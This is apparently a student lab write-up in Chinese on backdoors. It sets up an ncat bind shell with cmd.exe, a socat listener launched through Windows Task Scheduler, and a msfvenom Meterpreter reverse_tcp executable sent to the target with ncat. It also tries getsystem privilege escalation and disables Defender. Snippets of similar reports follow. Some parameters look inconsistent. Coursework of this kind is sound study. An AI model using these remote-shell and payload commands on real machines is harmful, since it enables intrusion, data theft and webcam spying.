Exp2 後門原理與實踐

2022-05-21 11:30:10 字數 1234 閱讀 9244

1.在win10的cmd裡,進入d:\ncat\ncat,輸入ncat -l -e cmd.exe -p 53

2.在kali的終端裡,輸入nc 172.16.2.29 53連線win10,獲得shell許可權

1.在win10靶機中點選控制面板->系統和安全->管理工具->任務計畫程式,話不多說,上圖。

在操作選項卡中繫結socat程式,給出引數tcp-listen:5332exec:cmd.exe,pty,stderr

右鍵5332程序,然後啟動就行。

2.在kali虛擬機器中,socat - tcp:172.16.2.29:5332

,就可以獲得win10的shell許可權了

1.在kali虛擬機器中用meterpreter生成後門。

輸入指令msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.2.29 lport=5332 -f exe > backdoor.exe

2.把這個後門用ncat傳送到靶機上。

kali:ncat -l 5332 < backdoor.exe

nc 172.16.2.29 > backdoor.exe

3.開啟後門

4.開始竊取個人隱私

5.嘗試提權

輸入getsystem提權,但是失敗了。

答:太多了。作為《機要風雲》的演員之一,我飾演的機要員小劉的電腦就被黑客植入過後門。

用一些破解軟體,比如我的office就是用小馬kms啟用的,可能就在電腦留下了後門。

有人趁我不注意用u盤拷到我的電腦裡。

偽裝成正規軟體,雙擊就可以啟動。

或者設定為開機自啟動。

可以開啟電腦的攝像頭,可以直播。去年參加微視演繹的時候,學姐給我電腦裡植入的後門,開啟了我的攝像頭,我感到震驚。畢竟自己膝上型電腦的攝像頭從來沒用過,然後就被別人控制了,太可怕了。現在我終於知道了這個其實並不難。

用windows defender對電腦進行實時防護。

做實驗的時候我只有把他關了才能執行這個後門程式。一開啟windows defender就會提醒電腦有惡意病毒,然後就把它刪了。

所以,自帶的防毒軟體還是不錯的。

20155207王雪純 Exp2 後門原理與實踐

windows 使用 ipconfig 命令檢視當前機器ip位址。進入ncat所在檔案位址,使用ncat命令開啟監聽 linux 連線win 在linux終端輸入命令ifconfig檢視虛擬機器linux的ip號。然後輸入命令nc l p 5207讓虛擬機器開始監聽指定埠5207 在windows命...

20145304 劉欽令 Exp2 後門原理與實踐

1 例舉你能想到的乙個後門進入到你系統中的可能方式?2 例舉你知道的後門如何啟動起來 win及linux 的方式?3 meterpreter有哪些給你映像深刻的功能?4 如何發現自己有系統有沒有被安裝後門?這次實驗,讓我真正體驗到了之前聽說的一些入侵攻擊方法,因為攻擊者和被攻擊者都是自己,所以實驗過...

20145237 Exp2 後門原理與實踐

20145237 網路對抗 exp2 後門原理與實踐 在windows下,先使用ipconfig指令檢視本機ip 輸入ncat.exe l p 5237使用ncat.exe程式監聽本機的5237埠 在kali環境下,使用nc指令的 e選項反向連線windows主機的5237埠 windows下成功獲...